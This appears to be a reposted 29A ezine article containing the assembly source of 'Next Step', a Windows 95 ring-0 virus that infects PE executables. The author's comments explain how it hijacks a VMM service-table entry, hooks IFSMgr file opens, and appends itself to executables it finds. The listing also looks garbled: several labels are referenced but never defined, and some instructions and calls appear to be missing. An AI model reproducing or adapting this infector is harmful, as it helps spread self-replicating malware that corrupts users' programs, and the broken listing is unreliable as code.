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29A Issue 03 04 02

eZine's profile picture
Published in 
 · 28 Dec 2019


; Next Step by Quantum / VLAD
;Anyone who had read my Fuck Harry source will find this virus very
;similar. Just recently I became interested in writing a ring-0 win95 PE
;infector again. On looking at my Fuck Harry virus I noticed a number of
;improvements that could be made. This virus is the product. Fuck Harry
;used zero space in the VMM device driver to store itself. This virus
;could do that just as well but instead I have come up with a better
;method. Using the heap alloc function of IFSMgr this virus is more
;stable. It also includes a bit of code which I assume would allow this
;virus to return to host under winNT without giving errors.
;When I look at this virus and Fuck Harry I still can't beleive the
;mental alienation of Microsoft. The idea that a ring-3 application
;running in a seperate virtual machine can write to ring-0 vxd space is
;beyond incompetense. Not only is it possible to write to vxd space but
;you can set an entry in the VMM service table that gets called every
;second (Get_System_Time) to a handler that is in a ring-3 selector.
;That's what this virus does. Once the handler gets control it allocates
;some space on the IFSMgr heap and copies the virus there. It then calls
;the IFSMgr_InstallFileSystemApiHook routine to trap file opens. So,
;needless to say, such terms as "Hacking ring-0" don't apply to windows
;95. I sincerely hope that such things are not mirrored in windows NT.
;I don't have winNT (or desire to install it) so I can't check. If such
;things were possible one would suspect security concerns to be raised.
;The one thing I hate is the way dynamic linking is done. It's a good
;idea I guess but it means you have to put the dynamic linking code back
;before you write the file - annoying.
;I actually have tried to optimize this virus. You could take out all
;the little checks, write to zero space in vmm again, etc and make this
;virus smaller but I honestly think sacrificing stability for size is a
;pointless exercise.
; 642 bytes
.model flat,STDCALL

; Define the external functions we will be linking to
extrn ExitProcess:PROC

copyright db 'Custom Host',0

; dynamic linking
IFSMgr_GetHeap equ db 0cdh,20h,0dh,0,40h,0
IFSMgr_InstallFileSystemApiHook equ db 0cdh,20h,67h,0,40h,0
IFSMgr_Ring0_FileIO equ db 0cdh,20h,32h,0,40h,0
UniToBCSPath equ db 0cdh,20h,41h,0,40h,0

; these are some includes I lifted from
IFSFN_OPEN equ 36 ; open file
R0_READFILE equ 0d600h
R0_WRITEFILE equ 0d601h
R0_CLOSEFILE equ 0d700h

startvirus: ; virus starts here

mov ax,cs ; make sure cs is win95
cmp ax,137h
jnz weout

call recalc1 ; get delta offset
pop ebp
sub ebp,recalc1-startvirus

mov [ebp+delta1-startvirus],ebp ; self modify second delta

mov esi,0c000e98ch ; make sure vmm in right place
lea edi,[ebp+vmmstr-startvirus]
jnz weout
jnz weout
mov esi,[esi+30h-0ch-8] ; get the vmm service table
add esi,3fh*4
mov eax,[esi] ; get address of get_system_time

; save the offset of vmm service table entry for get_system_time
mov [ebp+p_get_sys_time-startvirus],esi
; save the address of get_system_time
mov [ebp+org_get_sys_time-startvirus],eax

; set get_system_time in vmm service table to our routine
mov dword ptr [esi],setuproutine-startvirus
add dword ptr [esi],ebp

; wait until routine has set itself up
cmp byte ptr [ebp+wtc-startvirus],1
jnz wait1


; return to host
db 068h ; push orghost
orghost dd offset dummyhost

vmmstr db "VMM " ; this must be in the vmm ddb

; above is ring-3. Below is ring-0.

; this routine is called in place of get_system_time
db 0bdh ; get the delta again
delta1 dd offset startvirus

; allocate some memory on the net stack
mov eax,endvirus-startvirus+1024
push eax
pop ecx
or eax,eax ; were we successful ??
jz nomem

xchg eax,edi ; yes. address -> edi
mov esi,ebp ; esi = startvirus
push edi ; save address
sub cx,1024
rep movsb ; copy the virus to net heap
pop edi

; save the ring0 delta offset
mov [edi+r0delta1-startvirus],edi
lea eax,[edi+apihook-startvirus] ; FSAPI hook
push eax
IFSMgr_InstallFileSystemApiHook ; set the hook
pop ebx
mov [edi+nexthook-startvirus],eax ; save the old hook

mov eax,0c000e980h+0ch+4 ; mark residency
mov [eax],eax

; set the vmm service table to the original value
db 0bfh ; mov edi,p_get_sys_time
p_get_sys_time dd 0
mov eax,[ebp+org_get_sys_time-startvirus]

; stop the host code waiting
mov byte ptr [ebp+wtc-startvirus],1

; go back to original get_system_time
db 068h ; push org_get_sys_time
org_get_sys_time dd 0

inuseflag db 0
wtc db 0

; this routine is called by IFSMgr whenever a file operation is performed
push ebp
mov ebp,esp

sub esp,20h

push ebx
push esi
push edi

db 0bfh ; mov edi,r0delta1
r0delta1 dd 0

cmp byte ptr [edi+inuseflag-startvirus],1 ; so we dont re-enter
je okfile

cmp dword ptr [ebp+12],IFSFN_OPEN ; is this an openfile call ?
jne okfile

mov byte ptr [edi+inuseflag-startvirus],1


; convert the name to ascii

lea esi,[edi+namestore-startvirus]
push esi
mov eax,[ebp+16]

cmp al,0ffh
je uncname

add al,'@'
mov [esi],al
inc esi
mov byte ptr [esi],':'
inc esi

xor eax,eax
push eax

dec al
push eax

mov ebx,[ebp+28]
mov eax,[ebx+12]
add eax,4
push eax

mov eax,esi
push eax


add esp,4*4

add esi,eax
mov byte ptr [esi],0 ;add the terminator-z

; is it exe ?
cmp dword ptr [esi-8],'OYOY' ; 7
pop eax ; 1
jne notexe ; 2
push eax ; 1
cmp dword ptr [esi-4],'EXE.'
pop esi
jne notexe

; set the dynamic routines that get altered to calls back to ints
mov cx,20cdh ;4
mov eax,40000dh ;5
mov word ptr [edi+fix1-startvirus],cx ;4
mov dword ptr [edi+fix1-startvirus+2],eax ;6
mov word ptr [edi+fix2-startvirus],cx ;4
mov al,41h ;2
mov dword ptr [edi+fix2-startvirus+2],eax ;6
mov word ptr [edi+fix3-startvirus],cx ;4
mov al,32h ;2
mov dword ptr [edi+fix3-startvirus+2],eax ;6

; open the file
xor ecx,ecx
; lea esi,[edi+namestore-startvirus]
mov bx,2
mov dx,1
call r0fio
jc notexe

xchg ebx,eax

; read the first 1024 bytes of the file
; lea esi,[edi+namestore-startvirus]
xor edx,edx
mov cx,1024
mov eax,R0_READFILE
call r0fio

; is it mz ?
cmp word ptr [esi],5a4dh
jnz fileclose

; get peheader offset
mov edx,[esi+3ch]

cmp edx,512 ; pe header too far along
ja fileclose

; is it pe,0,0 ?
cmp dword ptr [esi+edx],00004550h
jnz fileclose

test word ptr [esi+edx+22],2000h ; is it a library ?
jnz fileclose

; save the orghost
mov eax,[esi+edx+40]
add eax,[esi+edx+52]
mov [edi+orghost-startvirus],eax

push edx

; locate last object in the object table
movzx ecx,word ptr [esi+edx+6] ; get number of objects
mov eax,ecx
shl eax,5 ; mul 32
shl ecx,3 ; mul 8
add eax,ecx ; add em = mul by 28h
movzx ecx,word ptr [esi+edx+20] ; nt hdr size
add eax,ecx ; add it
sub eax,28h-24 ; add 24, sub 28h
add edx,eax ; esi+edx = last object

; get the entrypoint rva
mov ecx,[esi+edx+12] ; rva
add ecx,[esi+edx+16] ; physical size

; if last object size is odd then file already infected
mov eax,[esi+edx+16] ; physical size
test al,1
jnz fileclose1
add eax,[esi+edx+20] ; physical offset

or byte ptr [esi+edx+39],0e0h ; make object writable

push eax
mov ebp,(endvirus-startvirus) OR 1
add [esi+edx+16],eax ; physical size
mov eax,[esi+edx+16]
cmp [esi+edx+8],eax
ja noprob
mov [esi+edx+8],eax ; virtual size
pop eax

pop edx
push eax

; set the entrypoint rva
mov [esi+edx+40],ecx

; increase the image size
add dword ptr [esi+edx+80],ebp

; write the pe header
xor edx,edx
mov ecx,1024
mov eax,R0_WRITEFILE
call r0fio

; write the virus
pop edx
mov esi,edi
xchg ecx,ebp
mov eax,R0_WRITEFILE
call r0fio

push edx


pop edx


; close the file
mov eax,R0_CLOSEFILE
call r0fio


mov byte ptr [edi+inuseflag-startvirus],0


mov eax,[ebp+28] ; call the old hooker
push eax
mov eax,[ebp+24]
push eax
mov eax,[ebp+20]
push eax
mov eax,[ebp+16]
push eax
mov eax,[ebp+12]
push eax
mov eax,[ebp+8]
push eax

db 0b8h
nexthook dd 0
call [eax]

add esp,6*4

pop edi
pop esi
pop ebx






jmp rstart

push 0
call ExitProcess

end start

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